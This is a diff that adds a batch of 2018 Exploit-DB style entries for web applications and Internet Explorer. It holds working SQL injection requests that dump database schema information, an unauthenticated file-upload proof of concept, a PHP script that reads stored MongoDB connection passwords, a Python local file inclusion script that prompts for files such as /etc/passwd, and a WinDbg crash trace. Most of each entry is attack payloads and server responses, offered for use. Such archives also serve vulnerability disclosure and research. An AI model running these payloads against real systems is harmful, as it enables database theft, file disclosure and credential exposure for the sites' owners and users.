@@ -0,0 +1,59 @@ +# Exploit Title: SiAdmin 1.1 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.bubul.net/ +# Software Link: https://kent.dl.sourceforge.net/project/siadmin/SiAdmin%201.1/SiAdmin%201.1.zip +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/modul/mod_beasiswa/print.php?op=print&id=[SQL] +# +GET /[PATH]/modul/mod_beasiswa/print.php?op=print&id=-4%27%20%20UNION%20%20SELECT%201,2,3,4,5,6,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),8--%20- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 13:22:52 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: private, max-age=0, must-revalidate +Pragma: public +Content-Disposition: inline; filename="Ansanwan-Laporan.pdf" +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: application/pdf + +# POC: +# 2) +# http://localhost/[PATH]/show.php?op=beasiswa&act=lihat&id=[SQL] +# +GET 
/[PATH]/show.php?op=beasiswa&act=lihat&id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%37%2c%38%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 13:30:25 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 6079 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45775.txt b/exploits/php/webapps/45775.txt new file mode 100644 index 000000000..977d798fa --- /dev/null +++ b/exploits/php/webapps/45775.txt 
@@ -0,0 +1,97 @@ +# Exploit Title: WebVet 0.1a - 'id' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://webvet.exreality.net/ +# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip +# Version: 0.1a +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# /[PATH]/client.php +#091 else if (!empty($_POST['form_search_client'])) +#092 { +#093 $searchedClient = new Client(); +#094 if (!empty($_POST['id'])) +#095 $searchedClient->id = $_POST['id']; +#096 if (!empty($_POST['lastname'])) +#097 $searchedClient->lastname = $_POST['lastname']; +#098 if (!empty($_POST['patient'])) +#099 $searchedClient->patient = $_POST['patient']; +#100 +#101 // do the search +#102 $db_connection = db_open(db_user_name, db_user_passw, db_name); +#103 if (!$db_connection) die; +#104 $clients = db_search_client($searchedClient, clients_table_name, $db_connection); +#105 include "clients_view.php"; +#106 } + +# POC: +# 1) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 525 +id=1 UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:13:34 GMT +Server: Apache/2.4.25 (Win32) 
OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 501 +lastname=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:19:04 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 3) +# http://localhost/[PATH]/client.php +# +POST /[PATH]/client.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 499 +patient=' UNION SELECT 
0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 18:21:05 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 1229 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45777.txt b/exploits/php/webapps/45777.txt new file mode 100644 index 000000000..b51d78ca8 --- /dev/null +++ b/exploits/php/webapps/45777.txt 
@@ -0,0 +1,87 @@ +# Exploit Title: Poppy Web Interface Generator 0.8 - Arbitrary File Upload +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://poppy.dc-development.de/ +# Software Link: https://master.dl.sourceforge.net/project/poppy-beta-rc/poppy_0.8_beta_rc.zip +# Version: 0.8 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/phpWebFileManager-0.7/index.php +# +POST /[PATH]/phpWebFileManager-0.7/index.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: multipart/form-data; boundary= +---------------------------497318546845924055941951022 +Content-Length: 732 +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_filename" +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_dir" +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_action" +upload_file +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_userfile[0]"; filename="phpinfo.php" +Content-Type: application/force-download + +-----------------------------497318546845924055941951022 +Content-Disposition: form-data; name="fm_submit" +File upload +-----------------------------497318546845924055941951022-- +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 12:10:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/poppy_app/public/[FILE] +# + + + +#File Upload: +
+ + + + + +
+ +#Create File: +
+ + + + + +
+ +#File Edit: +
+ + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/45779.txt b/exploits/php/webapps/45779.txt new file mode 100644 index 000000000..b2c051b84 --- /dev/null +++ b/exploits/php/webapps/45779.txt @@ -0,0 +1,73 @@ +# Exploit Title: Mongo Web Admin 6.0 - Information Disclosure +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.mongoadmin.org/ +# Software Link: https://netix.dl.sourceforge.net/project/mongo-web-admin/mongoDesktopAdminSetup-beta-6.exe +# Version: 6.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Status/Protocol/Local host/Local port/Remote host/Remote port/PID/Process name +# Established/TCP/127.0.0.1/6376/127.0.0.1/6393/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6376/127.0.0.1/6394/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6393/127.0.0.1/6376/4520/mongoDesktopAdmin +# Established/TCP/127.0.0.1/6394/127.0.0.1/6376/4520/mongoDesktopAdmin + +GET /test.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,* /*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/ +Cookie: PHPSESSID=npbo6p4par2h1flfvc4lv04ok4; mongo-web-admin-session=bvf9kg9nod2gttd6rstk2l4q30 +DNT: 1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 16:27:16 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Content-Length: 490 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +header ('Content-type: text/html; charset=UTF-8'); + +$urlemiz= "http://127.0.0.1:6376/webservice/Data/"; +$y="connections.json"; +$jsonveri = file_get_contents($urlemiz.$y); +$ver = json_decode($jsonveri,true); +echo "
\n";
+print_r($ver);
+echo "\n
"; +/** +Array +( + [0] => Array + ( + [id] => 0.81395000 1342373198 + [name] => Default + [host] => localhost + [port] => 27017 + [user] => user1 + [password] => pass1 + ) + + [1] => Array + ( + [id] => 0.54691200 1541333748 + [name] => New connection + [host] => localhost + [port] => 27017 + [user] => user2 + [password] => pass2 + ) + +) \ No newline at end of file diff --git a/exploits/php/webapps/45780.py b/exploits/php/webapps/45780.py new file mode 100755 index 000000000..551a95209 --- /dev/null +++ b/exploits/php/webapps/45780.py @@ -0,0 +1,33 @@ +# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion +# Date: 04.11.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.php-proxy.com/ +# Software Link: https://github.com/Athlon1600/php-proxy-app +# Version: v3.0.3 +# Category: Webapps +# Tested on: XAMPP for Linux +# Description: Any user can read files from the server +# without authentication due to an existing LFI in the following path: +# http://target/index.php?q=file:///[FilePath] + +# PoC + +#!/usr/bin/python + +import urllib2, httplib, sys + +print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS" +print "[*] My Blog - https://www.pentest.com.tr\n" +print "[+] usage: python " + __file__ + " http://" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) +ip_add = sys.argv[1] + +fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n') + +print "Exploiting....." +print '\n' +URL = "http://" + ip_add + "/index.php?q=file:///" + fd + "" +print urllib2.urlopen(URL).read() \ No newline at end of file diff --git a/exploits/php/webapps/45784.txt b/exploits/php/webapps/45784.txt new file mode 100644 index 000000000..9630ddc79 --- /dev/null +++ b/exploits/php/webapps/45784.txt 
@@ -0,0 +1,37 @@ + Exploit Title: Voovi Social Networking Script 1.0 - 'user' SQL Injection +# Dork: N/A +# Date: 2018-11-04 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.adminspoint.com/voovi/index.php +# Software Link: https://netix.dl.sourceforge.net/project/voovi/voovi%20a%20social%20networking%20script.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/? +# +POST /[PATH]/? HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 165 +user=1' UNION SELECT NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL,NuLL-- -&password=&action=login&submit= +HTTP/1.1 200 OK +Date: Sun, 04 Nov 2018 14:22:41 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=v8nhfofpnrt6a4clfqbrp7aa00; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5987 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/local/45778.txt b/exploits/windows/local/45778.txt new file mode 100644 index 000000000..4067acb45 --- /dev/null +++ b/exploits/windows/local/45778.txt 
@@ -0,0 +1,193 @@ +# Exloit Title: Microsoft Internet Explorer 11 - Null Pointer Difference +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-11-03 +# Vendor: Microsoft Corporation +# Product web page: https://www.microsoft.com +# Affected version: 11.345.17134.0 (Update Versions: 11.0.90 (KB4462949)) +# 11.1387.15063.0 (Update Versions: 11.0.90 (KB4462949)) +# 11.0.9600.18282 (Update Versions: 11.0.30 (KB3148198)) +# 11.0.9600.17843 (Update Versions: 11.0.20 (KB3058515)) +# Tested on: Microsoft Windows 10 (EN) (64bit) +# Microsoft Windows 7 SP1 (EN) (32/64bit) +# Affected module: mshtml.dll +# Affected functions: Tree::Notify_InvalidateDisplay +# CTreeNode::EnsureNoDependentLayoutFixup +# CMarkup::BuildDescendentsList +# References: +# Advisory ID: ZSL-2018-5499 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5499.php + +# Desc: The crash is caused due to a NULL pointer dereference access violation inside the +# 'Tree::Notify_InvalidateDisplay' function while parsing malformed DOM elements. The issue +# was discovered using the Domato fuzzer. + +# Microsoft Internet Explorer 11 Tree::Notify_InvalidateDisplay Null Pointer Dereference +# PoC: https://www.zeroscience.mk/codes/msie11_nullptr_fuzz-33.html.rar + +# Trace: +################################################################################################ + +(e9c.142c): Access violation - code c0000005 (!!! second chance !!!) +eax=21b9efa0 ebx=21b9efac ecx=21b9efa0 edx=00000000 esi=00000000 edi=187a8fc4 +eip=63f04e48 esp=08c39ab8 ebp=08c39ac4 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43: +63f04e48 f70600010000 test dword ptr [esi],100h ds:002b:00000000=???????? 
+0:007> k + # ChildEBP RetAddr +00 08c39ac4 63a52ddf MSHTML!CTreeNode::EnsureNoDependentLayoutFixup+0x43 +01 08c39bd0 63a523c5 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x1f3 +02 08c39bf8 63a529d3 MSHTML!CMarkup::InsertElementInternal+0x3d +03 08c39c38 63a52a54 MSHTML!CDoc::InsertElement+0x9b +04 08c39cf8 63a3ca96 MSHTML!InsertDOMNodeHelper+0x154 +05 08c39db8 63a3cc73 MSHTML!CElement::InsertBeforeHelper+0x22b +06 08c39ddc 63a3cff3 MSHTML!CElement::InsertBefore+0x2f +07 08c39e70 63a3cf06 MSHTML!CElement::Var_appendChild+0xb3 +08 08c39ea0 6de5e6ee MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x75 +09 08c39f08 6de582cd jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x101 +0a 08c39f50 6df0833d jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 +0b 08c39f74 6dffc483 jscript9!Js::InterpreterStackFrame::OP_CallCommon >+0x53 +0c 08c39fa0 6dffc45c jscript9!Js::InterpreterStackFrame::OP_ProfileReturnTypeCallCommon >+0x1c +0d 08c39fc0 6dffc428 jscript9!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallI+0x2a +0e 08c3a1b0 6dee5371 jscript9!Js::InterpreterStackFrame::Process+0x4e90 +0f 08c3a1e8 6dee53d0 jscript9!Js::InterpreterStackFrame::OP_TryCatch+0x49 +10 08c3a3d8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x39dc +11 08c3bde4 0d8c0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce +WARNING: Frame IP not in any known module. Following frames may be wrong. 
+12 08c3bdf0 6de5c22d 0xd8c0fd9 +13 08c3bfe8 6de5c96b jscript9!Js::InterpreterStackFrame::Process+0x1940 +14 08c3c104 0d8c0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x1ce +15 08c3c110 6de582cd 0xd8c0fe1 +16 08c3c158 6de58a05 jscript9!Js::JavascriptFunction::CallFunction<1>+0x91 +17 08c3c1cc 6de5893f jscript9!Js::JavascriptFunction::CallRootFunction+0xc1 +18 08c3c214 6de588bf jscript9!ScriptSite::CallRootFunction+0x42 +19 08c3c244 6de5d0f0 jscript9!ScriptSite::Execute+0x61 +1a 08c3c2a0 6de5d02c jscript9!ScriptEngineBase::ExecuteInternal<0>+0xbb +1b 08c3c2b8 63a362a4 jscript9!ScriptEngineBase::Execute+0x1c +1c 08c3c374 63a3613e MSHTML!CListenerDispatch::InvokeVar+0x15a +1d 08c3c3a0 63a35e01 MSHTML!CListenerDispatch::Invoke+0x6d +1e 08c3c440 6398e7d2 MSHTML!CEventMgr::_InvokeListeners+0x1fe +1f 08c3c5b4 639d2863 MSHTML!CEventMgr::Dispatch+0x3bb +20 08c3c5dc 63eadc91 MSHTML!CEventMgr::DispatchEvent+0x90 +21 08c3c5f0 63e94da9 MSHTML!CSVGElement::Fire_SVGLoad+0x46 +22 08c3c608 63eadc43 MSHTML!CSVGSVGElement::Fire_SVGLoad+0x19 +23 08c3c620 63dafdc1 MSHTML!CSVGElement::Fire_SVGLoad_Async_Handler+0x23 +24 08c3c64c 6398f25c MSHTML!CAsyncEventQueue::DispatchAllEvents+0x41c3ea +25 08c3c6a0 771462fa MSHTML!GlobalWndProc+0x2d3 +26 08c3c7bc 00a3ee48 user32!InternalCallWinProc+0x23 +27 08c3c7c0 076bafe0 0xa3ee48 +28 08c3c7c4 00000000 0x76bafe0 + + +################################################################################################ + +(15e4.1634): Access violation - code c0000005 (!!! second chance !!!) +eax=00000000 ebx=22a98fa0 ecx=00000061 edx=000000c1 esi=22a96fac edi=0969c384 +eip=63916681 esp=0969c1d8 ebp=0969c200 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +MSHTML!CMarkup::BuildDescendentsList+0x158: +63916681 81b828030000609ffd63 cmp dword ptr [eax+328h],offset MSHTML!__vtguard (63fd9f60) ds:002b:00000328=???????? 
+0:008> k + # ChildEBP RetAddr +00 0969c200 6384f86d MSHTML!CMarkup::BuildDescendentsList+0x158 +01 0969c350 639b1597 MSHTML!CMarkup::Notify+0x17b +02 0969c3b8 639b1431 MSHTML!CMarkup::OnLoadStatusDone+0x14b +03 0969c3cc 639b078b MSHTML!CMarkup::OnLoadStatus+0xfa +04 0969c810 639aa322 MSHTML!CProgSink::DoUpdate+0x4c7 +05 0969c81c 6382e541 MSHTML!CProgSink::OnMethodCall+0x12 +06 0969c868 6382de4a MSHTML!GlobalWndOnMethodCall+0x16d +07 0969c8b8 771462fa MSHTML!GlobalWndProc+0x2e5 +08 0969c8e4 77146d3a user32!InternalCallWinProc+0x23 +09 0969c95c 771477c4 user32!UserCallWinProcCheckWow+0x109 +0a 0969c9bc 7714788a user32!DispatchMessageWorker+0x3b5 +0b 0969c9cc 6ce3f7c8 user32!DispatchMessageW+0xf +0c 0969fb98 6cf8f738 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464 +0d 0969fc58 7732e61c IEFRAME!LCIETab_ThreadProc+0x37b +0e 0969fc70 72f93991 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1c +0f 0969fca8 764b336a IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x94 +10 0969fcb4 778a9902 kernel32!BaseThreadInitThunk+0xe +11 0969fcf4 778a98d5 ntdll!__RtlUserThreadStart+0x70 +12 0969fd0c 00000000 ntdll!_RtlUserThreadStart+0x1b + +################################################################################################ + +FAILURE_BUCKET_ID: NULL_CLASS_PTR_READ_AVRF_c0000005_MSHTML.dll!Tree::Notify_InvalidateDisplay +BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_READ_INVALID_POINTER_READ_AFTER_CALL_AVRF_MSHTML!Tree::Notify_InvalidateDisplay+19 +FAILURE_EXCEPTION_CODE: c0000005 +FAILURE_IMAGE_NAME: MSHTML.dll + +-- + +(d98.d24): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +MSHTML!Tree::Notify_InvalidateDisplay+0x1f: +555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=???????? 
+1:022:x86> r +eax=00000000 ebx=204d6b40 ecx=10ba9500 edx=00000001 esi=204d6b40 edi=10ba9500 +eip=555ae81a esp=0535d3f8 ebp=0535d454 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +MSHTML!Tree::Notify_InvalidateDisplay+0x1f: +555ae81a 81b81804000080380100 cmp dword ptr [eax+418h],13880h ds:002b:00000418=???????? +1:022:x86> kb + # ChildEBP RetAddr Args to Child +00 0535d400 55d882b4 00000000 19540000 148ca2d0 MSHTML!Tree::Notify_InvalidateDisplay+0x1f +01 0535d454 55d547e9 148ca2a0 0535d4c8 204c7770 MSHTML!Tree::Notify_TextRangeHighlighted+0x140 +02 0535d4ac 55d55337 204c7770 204c7720 00000000 MSHTML!CSelectionRenderingServiceProvider::InvalidateSegment+0x148 +03 0535d4ec 5582e569 148ca270 00000001 19070980 MSHTML!CSelectionRenderingServiceProvider::PrivateClearSegment+0x106 +04 0535d504 556a24db 049c8000 148ca270 00000200 MSHTML!CDoc::RemoveSegment+0x39 +05 0535d52c 5529fe11 0535d55c 5529fdd0 11ef40b0 MSHTML!CSelTrackServices::ClearSelection+0x401d83 +06 0535d548 555e656d 00000000 00000001 00000001 MSHTML!CSelectTracker::BecomeDormant+0x41 +07 0535d568 555f8288 00000000 00000001 00000001 MSHTML!CSelectionManager::HibernateTracker+0x2b +08 0535d590 55f054b1 00000000 00000001 0000000c MSHTML!CSelectionManager::EnsureDefaultTrackerPassive+0x51 +09 0535d5c8 557f8eda 0535d630 555e9c37 00000000 MSHTML!CSelectionManager::DoPendingElementExit+0x429 +0a 0535d5d0 555e9c37 00000000 5555c8fa 00000000 MSHTML!CSelectionManager::DoPendingTasks+0x20f28e +0b 0535d5d8 5555c8fa 00000000 1b034680 00000000 MSHTML!CSelectionManager::EnsureEditContext+0x20 +0c 0535d630 5555c80e 0000000c 00000000 00000000 MSHTML!CSelectionManager::Notify+0x7c +0d 0535d654 5555c7a5 1b034680 0000000c 00000000 MSHTML!CHTMLEditor::Notify+0x51 +0e 0535d670 5555c5fd 1b034680 0000000c 00000000 MSHTML!CHTMLEditorProxy::Notify+0x35 +0f 0535d698 555e7edb 0000000c 00000000 00000000 MSHTML!CDoc::NotifySelection+0x4f +10 0535d92c 555e5c91 00000000 555e5c50 555e5c50 
MSHTML!CCaret::UpdateScreenCaret+0xbe +11 0535d940 555baffb 10b7d8f0 049c8000 0000011f MSHTML!CCaret::DeferredUpdateCaret+0x41 +12 0535d9bc 555bb394 d836afd1 00008002 00000000 MSHTML!GlobalWndOnMethodCall+0x21b +13 0535da08 75a9be6b 00190984 00008002 00000000 MSHTML!GlobalWndProc+0xe4 +14 0535da34 75a9833a 555bb2b0 00190984 00008002 USER32!_InternalCallWinProc+0x2b +15 0535db1c 75a97bee 555bb2b0 00000000 00008002 USER32!UserCallWinProcCheckWow+0x3aa +16 0535db98 75a979d0 b9836150 0535fd34 5643485f USER32!DispatchMessageWorker+0x20e +17 0535dba4 5643485f 0535dbe0 00e4b470 008ff230 USER32!DispatchMessageW+0x10 +18 0535fd34 56433e60 0535fe00 56433a50 00e433e8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x46f +19 0535fdf4 5bdcb61c 00e4b470 0535fe18 56488ce0 IEFRAME!LCIETab_ThreadProc+0x410 +1a 0535fe0c 5bd6e6cd 00e433e8 5bd6e640 5bd6e640 msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c +1b 0535fe44 77648484 0089c570 77648460 f7de4b1c IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d +1c 0535fe58 77a7305a 0089c570 005c205f 00000000 KERNEL32!BaseThreadInitThunk+0x24 +1d 0535fea0 77a7302a ffffffff 77a8ec8b 00000000 ntdll_77a10000!__RtlUserThreadStart+0x2f +1e 0535feb0 00000000 5bd6e640 0089c570 00000000 ntdll_77a10000!_RtlUserThreadStart+0x1b +1:022:x86> .exr -1 +ExceptionAddress: 555ae81a (MSHTML!Tree::Notify_InvalidateDisplay+0x0000001f) + 